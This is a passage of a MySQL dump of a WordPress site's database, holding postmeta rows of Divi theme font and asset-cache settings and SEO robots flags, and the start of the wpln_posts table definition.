\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31989,955,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31990,28,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:12:\"et_pb_button\";i:4;s:11:\"et_pb_image\";i:5;s:10:\"et_pb_text\";}}'),(31981,1149,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31982,1154,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31983,1154,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31984,1154,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31985,1154,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31986,955,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31987,955,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31973,1020,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31974,965,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31975,965,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31976,965,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31977,965,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31978,1149,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31979,1149,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31980,1149,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31965,1051,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31966,923,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31967,923,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31968,923,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31969,923,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31970,1020,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31971,1020,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31972,1020,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31958,1479,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31959,1479,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31960,1479,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31961,1479,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31962,1051,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31963,1051,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31964,1051,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31957,561,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31953,1060,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31954,561,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31955,561,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31956,561,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(31951,1060,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31952,1060,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(28783,1686,'_yoast_wpseo_meta-robots-nofollow','0'),(28784,1686,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28785,1686,'_seopress_robots_index','no'),(28786,1686,'_aioseop_noindex','off'),(28787,1686,'_genesis_noindex','0'),(31949,624,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(31950,1060,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(28764,1683,'_yoast_wpseo_meta-robots-noindex','2'),(28765,1683,'_yoast_wpseo_meta-robots-nofollow','0'),(28766,1683,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28767,1683,'_seopress_robots_index','no'),(28768,1683,'_aioseop_noindex','off'),(28769,1683,'_genesis_noindex','0'),(28770,1684,'_yoast_wpseo_meta-robots-noindex','2'),(28771,1684,'_yoast_wpseo_meta-robots-nofollow','0'),(28772,1684,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28773,1684,'_seopress_robots_index','no'),(28774,1684,'_aioseop_noindex','off'),(28775,1684,'_genesis_noindex','0'),(28776,1685,'_yoast_wpseo_meta-robots-noindex','2'),(28777,1685,'_yoast_wpseo_meta-robots-nofollow','0'),(28778,1685,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28779,1685,'_seopress_robots_index','no'),(28780,1685,'_aioseop_noindex','off'),(28781,1685,'_genesis_noindex','0'),(28782,1686,'_yoast_wpseo_meta-robots-noindex','2'),(28737,1678,'_seopress_robots_index','no'),(28738,1678,'_aioseop_noindex','off'),(28739,1678,'_genesis_noindex','0'),(28740,1679,'_yoast_wpseo_meta-robots-noindex','2'),(28741,1679,'_yoast_wpseo_meta-robots-nofollow','0'),(28742,1679,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28743,1679,'_seopress_robots_index','no'),(28744,1679,'_aioseop_noindex','off'),(28745,1679,'_genesis_noindex','0'),(28746,1680,'_yoast_wpseo_meta-robots-noindex','2'),(28747,1680,'_yoast_wpseo_meta-robots-nofollow','0'),(28748,1680,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28749,1680,'_seopress_robots_index','no'),(28750,1680,'_aioseop_noindex','off'),(28751,1680,'_genesis_noindex','0'),(28752,1681,'_yoast_wpseo_meta-robots-noindex','2'),(28753,1681,'_yoast_wpseo_meta-robots-nofollow','0'),(28754,1681,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28755,1681,'_seopress_robots_index','no'),(28756,1681,'_aioseop_noindex','off'),(28757,1681,'_genesis_noindex','0'),(28758,1682,'_yoast_wpseo_meta-robots-noindex','2'),(28759,1682,'_yoast_wpseo_meta-robots-nofollow','0'),(28760,1682,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28761,1682,'_seopress_robots_index','no'),(28762,1682,'_aioseop_noindex','off'),(28763,1682,'_genesis_noindex','0'),(28728,1677,'_yoast_wpseo_meta-robots-noindex','2'),(28729,1677,'_yoast_wpseo_meta-robots-nofollow','0'),(28730,1677,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(28731,1677,'_seopress_robots_index','no'),(28732,1677,'_aioseop_noindex','off'),(28733,1677,'_genesis_noindex','0'),(28734,1678,'_yoast_wpseo_meta-robots-noindex','2'),(28735,1678,'_yoast_wpseo_meta-robots-nofollow','0'),(28736,1678,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(31946,624,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(31947,624,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(31948,624,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'); /*!40000 ALTER TABLE `wpln_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_posts` -- DROP TABLE IF EXISTS `wpln_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_posts` ( `ID` bigint unsigned NOT NULL AUTO_INCREMENT, `post_author` bigint unsigned NOT NULL DEFAULT '0', `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `post_title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `post_excerpt` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `post_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'publish', `comment_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open', `ping_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open', `post_password` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `post_name` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `to_ping` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `pinged` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content_filtered` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `post_parent` bigint unsigned NOT NULL DEFAULT '0', `guid` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `menu_order` int NOT NULL DEFAULT '0', `post_type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'post', `post_mime_type` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '', `comment_count` bigint NOT NULL DEFAULT '0', PRIMARY KEY (`ID`), KEY `post_name` (`post_name`(191)), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`), KEY `type_status_author` 